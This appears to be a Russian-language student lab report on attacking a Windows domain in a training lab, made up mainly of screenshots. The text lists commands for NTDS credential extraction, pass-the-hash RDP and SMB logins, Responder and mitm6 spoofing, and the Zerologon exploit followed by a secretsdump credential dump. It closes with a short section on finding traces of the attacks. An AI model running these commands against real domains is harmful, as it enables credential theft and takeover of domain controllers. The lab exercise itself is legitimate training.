# **Практическая работа №6** --- # Занятие 6 - *Базовые атаки и компрометация доменной Windows-инфраструктуры* # Задание: 1) Провести анализ базы NTDS 2) Выполнить атаку “Path-the-hash” 3) Реализовать атаки на базовые протоколы Windows ## Часть 1. Базовые атаки на инфраструктуру Windows ### Этап 1. Анализ базы NTDS #### 1.1 Бэкап NTDS ![](https://i.imgur.com/HNqiebn.png) ![](https://i.imgur.com/wbi7iSS.png) #### 1.2 Перенос NTDS ![](https://i.imgur.com/t0FT8nL.png) ![](https://i.imgur.com/ChnUNao.png) #### 1.3 Анализ NTDS ![](https://i.imgur.com/E4GeZMW.png) ![](https://i.imgur.com/zMddAsf.png) ![](https://i.imgur.com/dNwfhjI.png) ### Этап 2. Path-the-hash #### 2.1 Crackmapexec ![](https://i.imgur.com/biY2zN0.png) #### 2.2 XFreeRDP ![](https://i.imgur.com/JsSJMsF.png) ``` powershell New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedA dmin" -Value "0" -PropertyType DWORD -Force ``` ![](https://i.imgur.com/eeVpntt.png) ![](https://i.imgur.com/9LNQM1y.png) ``` bash xfreerdp /d:pt.local /u:administrator /v:192.168.10.200 /pth:47b7769d0649df31863071ec8c2b9665 ``` ps: скриншот подключения по rdp никаким образом не хотел вставляться в отчёт ![](https://i.imgur.com/rDlgahd.jpg) ### Этап 3. Атаки на базовые протоколы Windows #### Анализ инфраструктуры через responder ![](https://i.imgur.com/Zdi5VBe.png) ![](https://i.imgur.com/tMsDGUx.png) ![](https://i.imgur.com/5ZJlwSv.png) ![](https://i.imgur.com/p0sMlYu.png) ![](https://i.imgur.com/BVDZao5.png) ![](https://i.imgur.com/jItmTvk.png) #### mitm6 ![](https://i.imgur.com/lV8UwJq.png) ![](https://i.imgur.com/ozQ8S77.png) ![](https://i.imgur.com/NKDsBPQ.png) ![](https://i.imgur.com/uM3xUEv.png) ```bash python3 smbserver.py -smb2support SMB /root/SMB ``` ![](https://i.imgur.com/nPxZmTR.png) ![](https://i.imgur.com/iq58ZE5.png) ![](https://i.imgur.com/Vl53PUa.png) # Задание: 1) Провести эксплуатацию уязвимостей контроллера домена 2) Найти следы эксплуатации уязвимостей ![](https://i.imgur.com/xcV0DP6.png) ![](https://i.imgur.com/iCO9XLz.png) ## Часть 2. Эксплуатация уязвимостей контроллера домена ```bash git clone https://github.com/risksense/zerologon ``` ![](https://i.imgur.com/fBcSrbd.png) ```bash python3 set_empty_pw.py DC1 192.168.10.200 ``` ![](https://i.imgur.com/tZVtTjS.png) ```bash git clone https://github.com/SecureAuthCorp/impacket ``` ![](https://i.imgur.com/mLMH4bw.png) ```bash python3 secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'PT/DC1$@192.168.10.200' ``` ![](https://i.imgur.com/wpBQY1k.png) ```bash crackmapexec smb 192.168.10.200 -u ADMPetr -H 05df2fd1109e3d3b60f110965f6af128 -x whoami ``` ![](https://i.imgur.com/a9CBsll.png) ### Часть 3. Поиск следов эксплуатации уязвимостей ![](https://i.imgur.com/M0jEbf9.png) ![](https://i.imgur.com/Lrw2xF3.png) ![](https://i.imgur.com/kVWj6Se.png) ![](https://i.imgur.com/2TwcAc5.png)